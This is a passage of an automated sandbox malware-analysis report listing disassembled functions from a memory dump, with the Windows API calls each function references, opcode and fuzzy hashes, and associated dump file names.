                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e1a345f7e16b2dfdc87c7b6d2043929f31e21db98391d485d7bda4e4ed1bff4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80D14D74A0424ADFCB14DF98C8819EEBBB5FF48314F144159E915AB391DB31AE45CFA0
                                                                                                                                                                                                                                                                  Function 00D0F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4fa5a447abe55752e09b81bc948ae8563657df35e1093ca1290a800954619e65
                                                                                                                                                                                                                                                                  • Instruction ID: d04d161d5c7af4e426c112de1cf047eeeca075a4c1482059948276bda20a555d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fa5a447abe55752e09b81bc948ae8563657df35e1093ca1290a800954619e65
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB51C635A04204AFDB20DF68C840BA97BA1EF85364F298168E85CDB7D1D771ED42CB70
                                                                                                                                                                                                                                                                  Function 00D4FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00D4FCCE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                  • Opcode ID: 98f455bf38d322995818e4da868b861ea49c52e8f2e671dbad2fe538be563019
                                                                                                                                                                                                                                                                  • Instruction ID: dcb85c6b423755b12dfac174670147ad94dbda466f288d0feb729c589708f100
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98f455bf38d322995818e4da868b861ea49c52e8f2e671dbad2fe538be563019
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC41D672900209AFCB11DFA8C8809AEB7B8EF44314F24453EE556D72A1EB70DE45CB70
                                                                                                                                                                                                                                                                  Function 00CE6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE664A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CE665C
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE663E: FreeLibrary.KERNEL32(00000000,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE666E
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE66AB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6610
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CE6622
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE6607: FreeLibrary.KERNEL32(00000000,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6635
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                  • Opcode ID: a828574fd9f6b3f6ac65fd40e029835bda7106bee8b2e3e0d501446e4ac64a08
                                                                                                                                                                                                                                                                  • Instruction ID: 171de9a863a780a00d5e0aadbd636eeafe96a9b041bed2559ae3887ed13b534c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a828574fd9f6b3f6ac65fd40e029835bda7106bee8b2e3e0d501446e4ac64a08
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4112B71620245AACF20AB21DC02BAD7BB59F60791F10442DF442AA1C2EE71DA05AB60
                                                                                                                                                                                                                                                                  Function 00D18782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4b587338a7d683019ee23cea972d7c2602412ddcc8b43a4dd737df9bec894821
                                                                                                                                                                                                                                                                  • Instruction ID: 4a99a61c7797bb0e696848af30d07956a857f65ac40f13a0ce7d127b1461452b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b587338a7d683019ee23cea972d7c2602412ddcc8b43a4dd737df9bec894821
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2411487590420AAFCB05DF98E9409DA7BF5EF48300F144069F808AB311DA31EA11DB74
                                                                                                                                                                                                                                                                  Function 00D15373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D14FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D15031
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D153DF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                  • Instruction ID: a8aee34ad4bb507ca5842d9a4cb37a2bec8bfb32be554387c1d87af987bab2fc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C301D6B2200705BBE3218E69F88599AFBE9EBC5370F65051DE59483280EE71A945C774
                                                                                                                                                                                                                                                                  Function 00D0E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                  • Instruction ID: 187675008b55ec433fda99f1ba2ffecb6f613b03d476ba31d4288b4f401c6e19
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F02832500620A6D6313B6AFC01BAA3399CF82334F150F26F469931D1EF74E8428AF2
                                                                                                                                                                                                                                                                  Function 00CEB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 176396367-0
                                                                                                                                                                                                                                                                  • Opcode ID: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                  • Instruction ID: 7120c52324929bf7c245698cbff00f6a435c925599456203b7b1a70f5c8b6608
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13e3f34f1ad86e8f32c6ece7b2ba72061abb35dc4d657d1d9fbb59e66f0b5d4f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBF0A4B26017047ED7149F29D806B66BB98EB44360F10812AFA1DCB1D1DB71E5108AB5
                                                                                                                                                                                                                                                                  Function 00D5F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00D5F987
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                  • Opcode ID: 613e9dbdec22f590a1bfbda2714db427b6ce68bec2115b3b4e5980bbba13cbad
                                                                                                                                                                                                                                                                  • Instruction ID: 94399a4d09a27e14f8e76203f12fb573e76aa7397a928c8182d18e99864cfad7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 613e9dbdec22f590a1bfbda2714db427b6ce68bec2115b3b4e5980bbba13cbad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F08176600205BFCB04EBA5DC46E9E7BB9EF55710F000054F909DB261DA70AA45CB71
                                                                                                                                                                                                                                                                  Function 00D14FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D1319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D15031
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5c2573b6b0a109dd81556d44802cbe99a19b602c2bc8741d599b0cec980b90fa
                                                                                                                                                                                                                                                                  • Instruction ID: bcdd207ff160643672c8582b0c7aa2ce3804ec96d5114fc9d670f2e6b490b629
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c2573b6b0a109dd81556d44802cbe99a19b602c2bc8741d599b0cec980b90fa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F0B432510E20FADB311AA6FC01B9B3758AFC57E0F194111BC08D7198DE68D88146F0
                                                                                                                                                                                                                                                                  Function 00D13B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: ec6c2dd6dc760e54cf44796e679fa0a0932f0a7bce5b7c1429a654659dacb245
                                                                                                                                                                                                                                                                  • Instruction ID: 1bd8ec04eaec5186bcac10760d074f9d124f058dd8c0dbc957e9b7b581e7c62b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec6c2dd6dc760e54cf44796e679fa0a0932f0a7bce5b7c1429a654659dacb245
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEE06D21248720B6DA212676FE01BDB3A58EF413A4F190165FC49E76D5FF70DEC085B4
                                                                                                                                                                                                                                                                  Function 00CE66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b9927cc4fdbc7d23071994d6810f554e476794f8391094e27a47b218d0f592b6
                                                                                                                                                                                                                                                                  • Instruction ID: 57a24ec3d2d5bcd08b067de3c94fe8b13c3c8b9bfbc0e717291cf5303cab8c1c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9927cc4fdbc7d23071994d6810f554e476794f8391094e27a47b218d0f592b6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF03071115751CFCB749F65E490816B7F4BF2435A314897EE5DA86610C7319840DF20
                                                                                                                                                                                                                                                                  Function 00D36AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4b391902cce3432e5ee9016e1ac70703d589644f1aea5c824065085f73aa31f1
                                                                                                                                                                                                                                                                  • Instruction ID: dd49a446741299916805b31ef0588ca6965b5130174caba125e1cf384c5bae16
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b391902cce3432e5ee9016e1ac70703d589644f1aea5c824065085f73aa31f1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0E571704304BAD7208B74A8097B5F7E8EB10314F18851AD9D9C2181D7F2C4D497B2
                                                                                                                                                                                                                                                                  Function 00CE684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                  • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                  • Instruction ID: 049aa1ae411489e604c228e93bf8328e13d8be87305c056ae397b9124cf22564
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0F87550020DFFDF05DF90C941EAEBB79FB14318F248445F9159A151C336EA21ABA1
                                                                                                                                                                                                                                                                  Function 00CE3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00CE3963
                                                                                                                                                                                                                                                                  Memory Dump Source
